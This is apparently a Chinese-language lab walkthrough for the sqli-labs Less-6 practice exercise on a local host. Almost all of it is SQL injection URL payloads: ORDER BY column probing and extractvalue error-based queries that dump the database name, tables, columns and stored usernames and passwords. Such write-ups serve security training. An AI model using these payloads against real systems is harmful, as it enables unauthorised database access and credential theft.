存在SQL注入，且闭合为双引号

查询数据库列数：http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 3--+

http://127.0.0.1/sqli-labs-master/Less-6/?id=1" order by 4--+

查询可知列数为3

查询数据库库名：http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e))--+ 

查询数据库中的表名:http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))--+ 

查询users表中的字段：http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'  and table_schema='security'),0x7e))--+ 

查询表内容：http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and extractvalue(1,concat(0x7e,(select group_concat(concat_ws(0x7e,username,password)) from security.users),0x7e))--+